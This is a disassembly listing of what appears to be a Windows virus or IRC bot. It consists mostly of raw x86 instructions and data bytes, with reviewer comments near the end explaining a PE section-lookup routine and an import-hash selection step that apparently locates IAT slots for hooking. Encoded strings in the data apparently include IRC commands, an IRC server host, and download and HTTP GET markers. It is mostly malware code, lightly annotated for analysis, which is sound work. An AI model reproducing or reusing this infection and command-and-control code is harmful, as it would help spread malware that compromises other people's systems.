loc_31439743 db 65h jb short near ptr loc_31439762+1 loc_314396F0: ; CODE XREF: sub_3143959F+DBj imul ebp, [edi+6Eh], 74654700h push esi loc_314396F8: ; CODE 
XREF: sub_3143959F+110j db 65h jb short near ptr loc_3143976C+2 imul ebp, [edi+6Eh], 417845h inc edi db 65h jz short near ptr loc_3143975B+1 outsd insb jnz short near ptr loc_31439771+6 loc_3143970A: ; CODE XREF: sub_3143959F:loc_314396BBj db 65h dec ecx outsb outsw jb short near ptr loc_3143977C+2 popa jz short near ptr loc_3143977C+1 outsd outsb inc ecx loc_31439717: ; CODE XREF: sub_3143959F:loc_314396D1j add [edi+ebp*2+61h], cl db 64h dec esp loc_3143971D: ; CODE XREF: sub_3143959F+12Ej imul esp, [edx+72h], 41797261h add [ebp+61h], cl jo short loc_3143977F loc_31439729: ; CODE XREF: sub_3143959F+120j imul esp, [ebp+77h], 6946664Fh insb loc_31439731: ; CODE XREF: sub_3143959F+13Fj ; sub_3143959F:loc_314396E2j add gs:[edi+70h], cl outs dx, byte ptr gs:[esi] inc esi imul ebp, [ebp+4Dh], 69707061h outsb db 67h inc ecx loc_31439743: ; CODE XREF: sub_3143959F:loc_314396EBj add [edi+70h], cl outs dx, byte ptr gs:[esi] push eax jb short near ptr loc_314397B9+1 arpl [ebp+73h], sp loc_3143974E: ; CODE XREF: sub_3143959F+146j jnb short $+2 push eax jb short loc_314397C2 arpl [ebp+73h], sp jnb short near ptr loc_31439784+7 xor al, [esi+69h] loc_3143975B: ; CODE XREF: sub_3143959F+164j jb short near ptr loc_314397CA+6 jz short $+2 push eax jb short near ptr loc_314397CA+7 loc_31439762: ; CODE XREF: sub_3143959F+14Ej arpl [ebp+73h], sp jnb short near ptr loc_31439799+1 xor cl, [esi+65h] js short near ptr loc_314397DC+4 loc_3143976C: ; CODE XREF: sub_3143959F:loc_314396F8j add [ebx+65h], dl jz short near ptr loc_314397B5+2 loc_31439771: ; CODE XREF: sub_3143959F+169j imul ebp, [ebp+41h], 69727474h bound esi, [ebp+74h] loc_3143977C: ; CODE XREF: sub_3143959F+173j ; sub_3143959F+170j db 65h jnb short loc_314397C0 loc_3143977F: ; CODE XREF: sub_3143959F+188j add [ebx+65h], dl jz short loc_314397CA loc_31439784: ; CODE XREF: sub_3143959F+1B7j imul ebp, [ebp+54h], 656D69h push ebx insb db 65h, 65h jo short $+4 push ebx jns short loc_31439808 jz short loc_314397FC insd push esp 
loc_31439799: ; CODE XREF: sub_3143959F+1C6j imul ebp, [ebp+65h], 69466F54h insb db 65h push esp imul ebp, [ebp+65h], 6D6E5500h popa jo short loc_31439803 imul esp, [ebp+77h], 6946664Fh insb loc_314397B5: ; CODE XREF: sub_3143959F+1D0j add gs:[esi+69h], dl loc_314397B9: ; CODE XREF: sub_3143959F+1AAj jb short near ptr loc_3143982E+1 jnz short loc_3143981E insb inc ecx insb loc_314397C0: ; CODE XREF: sub_3143959F:loc_3143977Cj insb outsd loc_314397C2: ; CODE XREF: sub_3143959F+1B2j arpl [eax], ax push edi jb short loc_31439830 jz short loc_3143982E inc esi loc_314397CA: ; CODE XREF: sub_3143959F+1E3j ; sub_3143959F:loc_3143975Bj ... imul ebp, [ebp+0], 6441744Eh push 75h jnb short loc_3143984A push eax jb short near ptr loc_3143983F+3 jbe short near ptr loc_3143983F+5 insb loc_314397DC: ; CODE XREF: sub_3143959F+1CBj db 65h, 67h, 65h jnb near ptr 9835h outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_3143982B+1 jb short near ptr loc_3143984F+1 popa jz short loc_31439853 inc esi imul ebp, [ebp+0], 7243744Eh db 65h popa jz short loc_31439860 push eax loc_314397FC: ; CODE XREF: sub_3143959F+1F6j jb short loc_3143986D arpl [ebp+73h], sp jnb short $+2 loc_31439803: ; CODE XREF: sub_3143959F+20Cj dec esi jz short near ptr loc_31439846+3 jb short loc_3143986D loc_31439808: ; CODE XREF: sub_3143959F+1F4j popa jz short loc_31439870 push eax jb short loc_3143987D arpl [ebp+73h], sp jnb short near ptr loc_31439853+5 js short $+2 dec esi jz short loc_3143985B jb short loc_3143987F popa jz short near ptr loc_3143987F+3 push ebx loc_3143981E: ; CODE XREF: sub_3143959F+21Cj arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl inc ebx jb short near ptr loc_3143988E+1 popa loc_3143982B: ; CODE XREF: sub_3143959F+248j jz short loc_31439892 push ebp loc_3143982E: ; CODE XREF: sub_3143959F+228j ; sub_3143959F:loc_314397B9j jnb short near ptr loc_31439894+1 loc_31439830: ; CODE XREF: sub_3143959F+226j jb short near ptr loc_3143987F+3 jb short loc_314398A3 arpl [ebp+73h], sp jnb 
short $+2 dec esi jz short loc_31439889 popa jo short near ptr loc_31439894+1 loc_3143983F: ; CODE XREF: sub_3143959F+238j ; sub_3143959F+23Aj imul esp, [ebp+77h], 6553664Fh loc_31439846: ; CODE XREF: sub_3143959F+265j arpl [ecx+ebp*2+6Fh], si loc_3143984A: ; CODE XREF: sub_3143959F+235j outsb add [esi+74h], cl dec edi loc_3143984F: ; CODE XREF: sub_3143959F+24Aj jo short loc_314398B6 outsb inc esi loc_31439853: ; CODE XREF: sub_3143959F+24Dj ; sub_3143959F+272j imul ebp, [ebp+0], 704F744Eh loc_3143985B: ; CODE XREF: sub_3143959F+277j outs dx, byte ptr gs:[esi] push eax jb short loc_314398CF loc_31439860: ; CODE XREF: sub_3143959F+25Aj arpl [ebp+73h], sp jnb short loc_314398B9 outsd imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314398BB+1 loc_3143986D: ; CODE XREF: sub_3143959F:loc_314397FCj ; sub_3143959F+267j jo short near ptr loc_314398D3+1 outsb loc_31439870: ; CODE XREF: sub_3143959F+26Aj push ebx arpl gs:[ecx+ebp*2+6Fh], si outsb add [esi+74h], cl push eax jb short near ptr loc_314398EB+1 loc_3143987D: ; CODE XREF: sub_3143959F+26Dj jz short near ptr loc_314398E3+1 loc_3143987F: ; CODE XREF: sub_3143959F+279j ; sub_3143959F+27Cj ... 
arpl [esi+edx*2+69h], si jb short loc_314398F9 jnz short near ptr loc_314398E7+1 insb dec ebp loc_31439889: ; CODE XREF: sub_3143959F+29Bj db 65h insd outsd jb short near ptr loc_31439904+3 loc_3143988E: ; CODE XREF: sub_3143959F+289j add [esi+74h], cl push ecx loc_31439892: ; CODE XREF: sub_3143959F:loc_3143982Bj jnz short loc_314398F9 loc_31439894: ; CODE XREF: sub_3143959F:loc_3143982Ej ; sub_3143959F+29Ej jb short near ptr loc_3143990E+1 dec ecx outsb outsw jb short near ptr loc_31439908+1 popa jz short loc_31439908 outsd outsb push esp outsd loc_314398A3: ; CODE XREF: sub_3143959F+293j imul esp, [ebp+6Eh], 0 dec esi jz short near ptr loc_314398FF+2 jb short loc_31439915 jz short near ptr loc_31439912+1 push esi imul esi, [edx+74h], 4D6C6175h loc_314398B6: ; CODE XREF: sub_3143959F:loc_3143984Fj db 65h insd outsd loc_314398B9: ; CODE XREF: sub_3143959F+2C4j jb short loc_31439934 loc_314398BB: ; CODE XREF: sub_3143959F+2CCj add [edx+74h], dl insb push ebp outsb imul esp, [ebx+6Fh], 74536564h jb short near ptr loc_31439931+2 outsb db 67h push esp outsd inc ecx loc_314398CF: ; CODE XREF: sub_3143959F+2BFj outsb jnb short near ptr loc_3143993A+1 push ebx loc_314398D3: ; CODE XREF: sub_3143959F:loc_3143986Dj jz short loc_31439947 imul ebp, [esi+67h], 41535700h push ebx jz short loc_31439940 jb short loc_31439955 jnz short near ptr loc_31439952+1 loc_314398E3: ; CODE XREF: sub_3143959F:loc_3143987Dj add [ebx+6Ch], ah outsd loc_314398E7: ; CODE XREF: sub_3143959F+2E6j jnb short loc_3143994E jnb short near ptr loc_31439959+1 loc_314398EB: ; CODE XREF: sub_3143959F+2DCj arpl [ebx+65h], bp jz short $+2 arpl [edi+6Eh], bp outsb arpl gs:[eax+eax+67h], si loc_314398F9: ; CODE XREF: sub_3143959F+2E4j ; sub_3143959F:loc_31439892j db 65h jz short near ptr loc_31439963+1 outsd jnb short near ptr loc_31439971+2 loc_314398FF: ; CODE XREF: sub_3143959F+309j bound edi, [ecx+6Eh] popa insd loc_31439904: ; CODE XREF: sub_3143959F+2EDj add gs:[edx+65h], dh loc_31439908: ; CODE XREF: 
sub_3143959F+2FEj ; sub_3143959F+2FBj arpl [esi+0], si jnb short near ptr loc_31439971+1 outsb loc_3143990E: ; CODE XREF: sub_3143959F:loc_31439894j add fs:[ebx+6Fh], dh loc_31439912: ; CODE XREF: sub_3143959F+30Dj arpl [ebx+65h], bp loc_31439915: ; CODE XREF: sub_3143959F+30Bj jz short $+2 dec ecx outsb jz short loc_31439980 jb short loc_3143998B db 65h jz short loc_31439963 insb outsd jnb short near ptr loc_31439988+1 dec eax popa outsb db 64h insb add gs:[ecx+6Eh], cl jz short loc_31439994 jb short near ptr loc_3143999E+1 loc_31439931: ; CODE XREF: sub_3143959F+329j db 65h jz short loc_3143997B loc_31439934: ; CODE XREF: sub_3143959F:loc_314398B9j db 65h jz short loc_3143997A outsd outsb outsb loc_3143993A: ; CODE XREF: sub_3143959F+331j arpl gs:[ebp+64h], si push ebx loc_31439940: ; CODE XREF: sub_3143959F+33Ej jz short near ptr loc_314399A2+1 jz short loc_314399A9 add [ecx+6Eh], cl loc_31439947: ; CODE XREF: sub_3143959F:loc_314398D3j jz short near ptr loc_314399AC+2 jb short loc_314399B9 db 65h jz short near ptr loc_3143999B+2 loc_3143994E: ; CODE XREF: sub_3143959F:loc_314398E7j jo short loc_314399B5 outsb inc ecx loc_31439952: ; CODE XREF: sub_3143959F+342j add [ecx+6Eh], cl loc_31439955: ; CODE XREF: sub_3143959F+340j jz short near ptr loc_314399BB+1 jb short loc_314399C7 loc_31439959: ; CODE XREF: sub_3143959F+34Aj db 65h jz short near ptr loc_314399AA+1 jo short loc_314399C3 outsb push ebp jb short near ptr loc_314399CC+2 inc ecx loc_31439963: ; CODE XREF: sub_3143959F+37Ej ; sub_3143959F:loc_314398F9j add [ecx+6Eh], cl jz short near ptr loc_314399CC+1 jb short loc_314399D8 db 65h jz short near ptr loc_314399BE+1 db 65h popa db 64h inc esi loc_31439971: ; CODE XREF: sub_3143959F+36Cj ; sub_3143959F+35Ej imul ebp, [ebp+0], 41564441h push eax loc_3143997A: ; CODE XREF: sub_3143959F:loc_31439934j dec ecx loc_3143997B: ; CODE XREF: sub_3143959F:loc_31439931j xor esi, [edx] db 2Eh inc esp dec esp loc_31439980: ; CODE XREF: sub_3143959F+37Aj dec esp add 
[edx+65h], dl db 67h inc ebx insb outsd loc_31439988: ; CODE XREF: sub_3143959F+383j jnb short near ptr loc_314399ED+2 dec ebx loc_3143998B: ; CODE XREF: sub_3143959F+37Cj db 65h jns short $+3 push edx db 65h, 67h dec edi jo short loc_314399F9 loc_31439994: ; CODE XREF: sub_3143959F+38Ej outsb dec ebx db 65h jns short near ptr loc_314399DC+2 js short loc_314399DC loc_3143999B: ; CODE XREF: sub_3143959F+3ACj add [edx+65h], dl loc_3143999E: ; CODE XREF: sub_3143959F+390j db 67h push ecx jnz short loc_31439A07 loc_314399A2: ; CODE XREF: sub_3143959F:loc_31439940j jb short near ptr loc_31439A1C+1 push esi popa insb jnz short near ptr loc_31439A0D+1 loc_314399A9: ; CODE XREF: sub_3143959F+3A3j inc ebp loc_314399AA: ; CODE XREF: sub_3143959F:loc_31439959j js short loc_314399ED loc_314399AC: ; CODE XREF: sub_3143959F:loc_31439947j add [edx+65h], dl db 67h push ebx db 65h jz short loc_31439A0A popa loc_314399B5: ; CODE XREF: sub_3143959F:loc_3143994Ej insb jnz short near ptr loc_31439A1C+1 inc ebp loc_314399B9: ; CODE XREF: sub_3143959F+3AAj js short loc_314399FC loc_314399BB: ; CODE XREF: sub_3143959F:loc_31439955j add [esi+33h], dl loc_314399BE: ; CODE XREF: sub_3143959F+3CBj imul byte ptr [edx+2] push esi push esi loc_314399C3: ; CODE XREF: sub_3143959F+3BDj mov edx, esp push 1 loc_314399C7: ; CODE XREF: sub_3143959F+3B8j push edx push dword ptr [edx+18h] push esi loc_314399CC: ; CODE XREF: sub_3143959F+3C7j ; sub_3143959F+3C1j call dword ptr [ebp+10427Ch] mov eax, esp push esi push esi push esi push eax loc_314399D8: ; CODE XREF: sub_3143959F+3C9j push esi push dword ptr [eax+18h] loc_314399DC: ; CODE XREF: sub_3143959F+3FAj ; sub_3143959F+3F7j call dword ptr [ebp+103EEAh] add esp, 10h pop esi retn 8 ; END OF FUNCTION CHUNK FOR sub_3143959F ; --------------------------------------------------------------------------- db 8Dh ; db 49h ; I db 0FBh ; db 2Bh ; + ; --------------------------------------------------------------------------- loc_314399ED: ; CODE XREF: 
sub_3143959F:loc_314399AAj ; sub_3143959F:loc_31439988j enter 6851h, 0 ; --------------------------------------------------------------------------- db 0 db 0 db 0E8h ; db 8Dh ; db 4Ch ; L db 24h ; $ db 3 db 6Ah ; j ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_3143959F loc_314399F9: ; CODE XREF: sub_3143959F+3F3j add [edx+5], ch loc_314399FC: ; CODE XREF: sub_3143959F:loc_314399B9j push ecx push eax push ebx push 5 mov ecx, esp push eax mov edx, esp push eax loc_31439A07: ; CODE XREF: sub_3143959F+401j push esp push 40h loc_31439A0A: ; CODE XREF: sub_3143959F+412j push ecx push edx push ebx loc_31439A0D: ; CODE XREF: sub_3143959F+408j call dword ptr [ebp+103F12h] add esp, 0Ch call dword ptr [ebp+103F1Ah] loc_31439A1C: ; CODE XREF: sub_3143959F:loc_314399A2j ; sub_3143959F+417j add esp, 8 retn ; END OF FUNCTION CHUNK FOR sub_3143959F ; --------------------------------------------------------------------------- db 8Dh ; db 95h ; db 20h db 3Eh ; > db 10h db 0 db 33h ; 3 db 0C9h ; db 6Ah ; j db 0 db 52h ; R db 68h ; h db 30h ; 0 db 0 db 32h ; 2 db 0 db 8Bh ; db 0C4h ; db 51h ; Q db 51h ; Q db 6Ah ; j db 40h ; @ db 50h ; P db 51h ; Q db 6Ah ; j db 18h db 83h ; db 0C0h ; db 8 db 54h ; T db 6Ah ; j db 0Eh db 50h ; P db 0FFh db 95h ; db 0Eh db 3Fh ; ? db 10h db 0 db 83h ; db 0C4h ; db 20h db 33h ; 3 db 0D2h ; db 85h ; db 0C0h ; db 0Fh db 99h ; db 0C2h ; db 0F7h ; db 0DAh ; db 58h ; X db 23h ; # db 0C2h ; db 0C3h ; db 57h ; W db 33h ; 3 db 0FFh db 0E8h ; db 0C1h ; db 0FFh db 0FFh db 0FFh db 0Fh db 84h ; db 0A5h ; db 0 db 0 db 0 db 50h ; P db 68h ; h db 18h db 73h ; s db 0 db 0 db 8Bh ; db 0D4h ; db 6Ah ; j db 0 db 8Bh ; db 0CCh ; db 6Ah ; j db 40h ; @ db 68h ; h db 0 db 0 db 10h db 0 db 6Ah ; j db 2 db 52h ; R db 6Ah ; j db 0 db 68h ; h db 18h db 73h ; s db 0 db 0 db 6Ah ; j db 0 db 51h ; Q db 53h ; S db 50h ; P db 0FFh db 95h ; db 2 db 3Fh ; ? 
db 10h db 0 db 5Fh ; _ db 59h ; Y db 0FFh db 95h ; db 52h ; R db 3Eh ; > db 10h db 0 db 85h ; db 0FFh db 74h ; t db 71h ; q db 8Bh ; db 8Dh ; db 80h ; db 15h db 10h db 0 db 0E3h ; db 0Ch db 8Dh ; db 95h ; db 0 db 10h db 10h db 0 db 3 db 0D1h ; db 57h ; W db 53h ; S db 0FFh db 0D2h ; db 8Bh ; db 85h ; db 0EEh ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 6 db 29h ; ) db 0 db 0 db 0E8h ; db 2Bh ; + db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 6 db 3Fh ; ? db 10h db 0 db 8Dh ; db 8Fh ; db 53h ; S db 29h ; ) db 0 db 0 db 0E8h ; db 1Ah db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F2h ; db 3Eh ; > db 10h db 0 db 8Dh ; db 8Fh ; db 5Ah ; Z db 29h ; ) db 0 db 0 db 0E8h ; db 9 db 0FFh db 0FFh db 0FFh db 8Bh ; db 85h ; db 0F6h ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 20h db 8Dh ; db 8Fh ; db 67h ; g db 29h ; ) db 0 db 0 db 0E8h ; db 0F4h ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 85h ; db 0FEh ; db 3Eh ; > db 10h db 0 db 85h ; db 0C0h ; db 74h ; t db 0Bh db 8Dh ; db 8Fh ; db 74h ; t db 29h ; ) db 0 db 0 db 0E8h ; db 0DFh ; db 0FEh ; db 0FFh db 0FFh db 8Bh ; db 0C7h ; db 5Fh ; _ db 0C3h ; db 55h ; U db 0E8h ; db 0 db 0 db 0 db 0 ; --------------------------------------------------------------------------- pop ebp sub ebp, 101B14h xor ecx, ecx lea eax, [ebp+101E9Fh] push ecx push esp push ecx push ecx push eax push ecx push ecx call dword ptr [ebp+103E7Eh] xchg eax, [esp] call dword ptr [ebp+103E52h] pop ebp retn 4 ; --------------------------------------------------------------------------- db 55h, 0E8h, 0 dd 5D000000h, 1B43ED81h, 0FF6A0010h, 1B0E958Dh, 52500010h dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B54h, 85C720CDh dd 101B56h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h dd 69C3F075h, 103F6C95h, 8840500h, 95894208h, 103F6Ch dd 55C3E2F7h, 0E8h, 0ED815D00h, 101B9Dh, 3F709D8Bh, 7C830010h dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0A695FF00h dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h dd 0A295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h 
dd 68016Ah, 52400000h, 3E6E95FFh, 85960010h, 505B74F6h dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F4Eh dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EE695FFh dd 85590010h, 56D075C0h, 3E5295FFh, 578D0010h, 6A575244h dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h dd 3E7695FFh, 0C4810010h, 208h, 82474FFh, 3F3E95FFh, 0FF530010h dd 103F3E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10157C8Dh dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h dd 6A51CEh, 0FF535651h, 103F3695h, 0C13B5900h, 0DF850Fh dd 858D0000h, 101E93h, 0C68006Ah, 50000000h, 3695FF53h dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h dd 103ED6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh dd 64616Fh, 3F4695FFh, 0C0850010h, 0C9333674h, 3F708589h dd 68510010h, 80000200h, 50565151h, 3F4A95FFh, 958D0010h dd 101B97h, 54C93350h, 51525051h, 7E95FF51h, 8700103Eh dd 95FF2404h, 103E52h, 8D80C3F8h, 10156Fh, 6AC3F901h, 0FF016A01h dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h dd 101DBBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F1295h, 868D8B00h dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h dd 2007473h, 55500000h, 703C8972h, 69786F72h, 72692E6Dh dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 62627075h dd 6F616D63h, 4553550Ah, 4A792052h, 204E494Fh, 72697626h dd 550A7574h, 0E8h, 0ED815D00h, 101EA5h, 156F85C6h, 0FF000010h dd 103EAA95h, 1FE8C100h, 
1E6A3C74h, 3E62B58Bh, 0AC590010h dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F66BDh, 2768B00h dd 0A566A557h, 38DC858Dh, 858F0010h, 103902h, 0FA4689FAh dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EB695h dd 74C00B00h, 26A930Dh, 5E95FF53h, 0FF00103Eh, 97E893D0h dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EB695h dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h dd 10431485h, 51515100h, 51515051h, 0B295FF51h, 0E800103Eh dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EB695h, 0AE800h dd 73770000h, 6E697270h, 416674h, 5E95FF50h, 8900103Eh dd 103E6685h, 8D310F00h, 1019758Dh, 6C858900h, 5100103Fh dd 3EB695FFh, 68930010h, 4, 1982B58Dh, 8D590010h, 103F52BDh dd 0F5C2E800h, 0C766FFFFh, 101E6585h, 83500000h, 101E67A5h dd 958D0000h, 101E25h, 16A5450h, 6852006Ah, 80000002h dd 3F5695FFh, 0C0850010h, 8D22755Ah, 101E588Dh, 66A5200h dd 1E65B58Dh, 56540010h, 52515050h, 3F5A95FFh, 0FF580010h dd 103F5295h, 7385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h dd 4C4C442Eh, 0B695FF00h, 9300103Eh, 768h, 0D9B58D00h dd 59001018h, 3F22BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h dd 2E54454Eh, 4C4C44h, 3EB695FFh, 0C0850010h, 235840Fh dd 68930000h, 5, 1917B58Dh, 8D590010h, 103F3EBDh, 0F506E800h dd 0BD83FFFFh, 103F42h, 10840F00h, 81000002h, 190ECh, 1685400h dd 0FF000001h, 103F2295h, 90C48100h, 50000001h, 6AD48Bh dd 4295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0D695FF00h dd 0EB00103Eh, 67BD83E2h, 101Eh, 858D2975h, 101E6Bh, 2E95FF50h dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh dd 101E67h, 417385C6h, 6A010010h, 6A016A00h, 3A95FF02h dd 8300103Fh, 840FFFF8h, 160h, 63958D93h, 6A00101Eh, 0FF535210h dd 103F2A95h, 0FC08500h, 14085h, 84BD8D00h, 0B100101Eh dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h dd 103EAEh, 1E92BD8Dh, 1B10010h, 0FFFA1DE8h, 7F958DFFh dd 6A00101Eh, 146800h, 53520000h, 3F3695FFh, 448D0010h dd 958D1424h, 104314h, 0AB60F50h, 1424448Bh, 208E0C1h dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h 
dd 0FF102444h, 0BD8D5032h, 103F74h, 1CE8h, 362E2500h, 202E2078h dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh dd 95FF5700h, 103E66h, 0ACC481h, 6A0000h, 0FF535750h, 103F3695h dd 888D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h dd 95FF5700h, 103E66h, 500CC483h, 7680BEBh, 8D000000h dd 101E98BDh, 0FF535700h, 103F3695h, 7EC08500h, 74B58D54h dd 8300103Fh, 101588A5h, 8D8D0000h, 104173h, 6ACE2Bh, 0FF535651h dd 103F3295h, 0F88300h, 8B912F7Eh, 74B58DFEh, 0B000103Fh dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh dd 2BCF8BEAh, 74BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h dd 103F26h, 156FBD80h, 74010010h, 7530682Ah, 95FF0000h dd 103ED6h, 4173BD80h, 74000010h, 6785C711h, 101Eh, 0C6000000h dd 10417385h, 8E90000h, 0C7FFFFFEh, 10157885h, 0 dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h dd 6299AD47h, 10A61429h, 0C26CCC5Ch, 606EF96Ah, 1Bh dup(0) ; =============== S U B R O U T I N E ======================================= sub_3143A404 proc near ; CODE XREF: sub_3143A4BA:loc_3143A4A8p ; sub_3143A50B+7p ... 
; sub_3143A404 -- find the section record that contains a given RVA.
; In:    arg_0 ([esp+4]) = RVA to look up
;        ebx = header base. The offsets used (+6 record count, +14h variable-part size,
;        +18h start of variable part, 28h-byte records with fields at +8/+0Ch/+14h) match
;        IMAGE_NT_HEADERS followed by IMAGE_SECTION_HEADERs -- presumably ebx points at the
;        'PE' signature of a mapped file; confirm at the callers.
; Out:   [ebp+1042E4h] = address of the matching record (0 if none)
;        [ebp+1042E8h] = record[+14h] - record[+0Ch]  (PointerToRawData - VirtualAddress,
;                        i.e. the value to add to an RVA to get a file offset; 0 if none)
; Clobb: none (pusha/popa); removes its argument (retn 4)
; NOTE(review): the record count is not checked for zero (`loop` with ecx = 0 wraps) and
; the table is not bounded against the mapping size.
arg_0 = dword ptr 4
        pusha
        and dword ptr [ebp+1042E4h], 0  ; results default to "not found"
        and dword ptr [ebp+1042E8h], 0
        movzx eax, word ptr [ebx+14h]
        lea edx, [ebx+18h]
        movzx ecx, word ptr [ebx+6]     ; ecx = number of records to scan
        add edx, eax                    ; edx -> first 28h-byte record
loc_3143A420: ; CODE XREF: sub_3143A404+41j
        mov eax, [esp+20h+arg_0]
        sub eax, [edx+0Ch]              ; eax = RVA - record.VirtualAddress
        jb short loc_3143A442           ; RVA lies below this record
        cmp eax, [edx+8]
        jnb short loc_3143A442          ; offset >= record[+8] (VirtualSize): not in this record
        mov eax, [edx+14h]
        sub eax, [edx+0Ch]
        mov [ebp+1042E4h], edx
        mov [ebp+1042E8h], eax
        jmp short loc_3143A447
; ---------------------------------------------------------------------------
loc_3143A442: ; CODE XREF: sub_3143A404+23j ; sub_3143A404+28j
        add edx, 28h
        loop loc_3143A420
loc_3143A447: ; CODE XREF: sub_3143A404+3Cj
        popa
        retn 4
sub_3143A404 endp
; ---------------------------------------------------------------------------
; Unlabelled entry fragment. It stores al at [ebp+102457h] and calls sub_3143A4BA.
; sub_3143A4BA pops its own return address into [ebp+1042C4h], so the code from
; `push 1Fh` onward is what sub_3143A50B later invokes through that slot, once per
; eligible import, with ebx = hash of the import name.
; NOTE(review): [ebp+102457h] is written as a byte here and read as a dword below; it may
; address the immediate of `push 1Fh` (self-modified table length) -- confirm the ebp base.
        mov [ebp+102457h], al
        call sub_3143A4BA
        push 1Fh
        lea eax, [ebp+102384h]          ; table of dword hashes
        pop ecx
loc_3143A462: ; CODE XREF: UPX2:3143A469j
        cmp [eax], ebx
        jz short loc_3143A472
        add eax, 4
        loop loc_3143A462
        inc dword ptr [ebp+1042C0h]     ; hash not in table: count it and resume the walk
        retn
; ---------------------------------------------------------------------------
; Hash found in the table: entries in front of the match are each copied one slot
; toward it and ebx is written to the first slot, then the walk is abandoned below.
loc_3143A472: ; CODE XREF: UPX2:3143A464j
        neg ecx
        add ecx, [ebp+102457h]
        jecxz short loc_3143A48C
loc_3143A47C: ; CODE XREF: UPX2:3143A484j
        push dword ptr [eax-4]
        pop dword ptr [eax]
        sub eax, 4
        loop loc_3143A47C
        mov [ebp+102384h], ebx
; START OF FUNCTION CHUNK FOR sub_3143A4BA
; Selection exit. Entered from inside a callback, so the stack holds
; [return into sub_3143A50B][saved ebx][saved esi]; edx = current 14h-byte import
; record, esi = thunk cursor one dword past the chosen entry.
; Result: ecx = (address of chosen thunk in the [edx+10h] array) - file base
;               - [ebp+1042E8h] + [ebx+34h]
; which, with the PE offsets assumed above, is the virtual address of the chosen
; import's IAT slot in the loaded image. How the caller uses ecx is not visible here.
loc_3143A48C: ; CODE XREF: UPX2:3143A47Aj ; sub_3143A4BA+34j
        cmp dword ptr [edx], 0
        jz short loc_3143A496
        sub esi, [edx]                  ; cursor was in the [edx+0] array: rebase it
        add esi, [edx+10h]              ; onto the [edx+10h] array
loc_3143A496: ; CODE XREF: sub_3143A4BA-2Bj
        lea ecx, [esi-4]                ; lodsd already advanced past the entry
        pop eax                         ; drop the callback's return address
        pop ebx                         ; restore header pointer
